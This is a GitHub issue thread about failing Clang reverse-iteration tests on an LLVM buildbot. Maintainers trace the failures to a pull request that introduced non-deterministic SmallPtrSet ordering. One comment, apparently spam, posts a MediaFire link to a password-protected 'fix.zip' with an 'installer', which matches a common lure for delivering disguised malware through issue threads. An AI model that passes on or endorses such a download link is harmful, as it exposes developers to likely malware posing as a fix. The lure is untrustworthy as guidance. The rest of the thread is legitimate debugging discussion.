### ISSUE TITLE
`reverse-iteration` tests fail in the CI

### ISSUE THREAD

**Issue by firewave** [llvm/llvm-project#106355]
https://lab.llvm.org/buildbot/#/builders/110/builds/942

```
FAIL: Clang::bool.cpp
FAIL: Clang::class_template_partial_spec.cpp
FAIL: Clang::class_template_spec.cpp
FAIL: Clang::global_func_template.cpp
FAIL: Clang::global_func_template_spec.cpp
FAIL: Clang::global_var_template_partial_spec.cpp
FAIL: Clang::multi_file.c
FAIL: Clang::global_record.c
FAIL: Clang::enum.c
FAIL: Clang::bool.c
FAIL: Clang::global_var_template_spec.cpp
FAIL: Clang::macro_undefined.c
FAIL: Clang::multiple_inheritance.cpp
FAIL: Clang::global_record_multifile.c
FAIL: Clang::objc_protocol.m
FAIL: Clang::simple_inheritance.cpp
FAIL: Clang::typedef_chain.c
FAIL: Clang::function_noexcepts.cpp
FAIL: Clang::vfs_redirected_include.m
FAIL: Clang::relative_include.m
```

The first failing build was https://lab.llvm.org/buildbot/#/builders/110/builds/728. Those initial failures appear to have been fixed since then but others have accumulated.

It looks like the current failures started with https://lab.llvm.org/buildbot/#/builders/110/builds/820.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nikic** [comment]
Most likely caused by https://github.com/llvm/llvm-project/pull/104922, which replaces an iterated-over vector with a SmallPtrSet, which has non-deterministic order.

cc @daniel-grumberg

**Comment by daniel-grumberg** [comment]
Yes that looks right! Let me fix this.
